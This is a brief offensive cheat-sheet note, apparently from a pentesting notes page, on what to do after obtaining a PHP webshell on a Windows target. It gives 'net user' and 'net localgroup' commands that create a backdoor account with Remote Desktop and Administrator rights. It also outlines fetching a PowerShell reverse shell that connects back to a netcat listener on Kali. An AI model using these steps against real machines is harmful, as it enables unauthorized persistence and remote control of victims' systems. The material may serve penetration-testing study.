php webshell obtained for windows target?

Once you can execute php shells on windows, you can then do:

  1. create an admin user on the machine (RDP rights if the port is open) - this won't be possible if you don't have the admin rights.

net user user1 password1 /add
net LOCALGROUP “Remote Desktop Users” user1 /ADD
net LOCALGROUP Administrators user1 /add

2. host a reverse shell ps1 script and make it grab it with a netcat listner hosted on kali. -> get rev shell.

Last updated